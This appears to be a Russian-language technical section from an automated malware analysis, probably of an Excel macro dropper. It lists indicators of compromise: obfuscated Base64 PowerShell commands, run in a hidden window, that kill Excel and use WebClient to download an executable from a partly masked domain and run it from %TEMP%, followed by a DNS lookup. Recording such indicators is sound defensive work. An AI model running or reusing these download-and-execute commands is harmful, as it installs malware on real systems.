Техническая информация
- '<SYSTEM32>\cmd.exe' /K CD C: & PowerShell -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQB...
- %TEMP%\ymtsvxszanla.exe
- 'pl####tulapiz.cl':80
- http://pl####tulapiz.cl/wp/wp-includes/images/wlw/arablogs.exe
- DNS ASK pl####tulapiz.cl
- '<SYSTEM32>\cmd.exe' /K CD C: & PowerShell -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAb...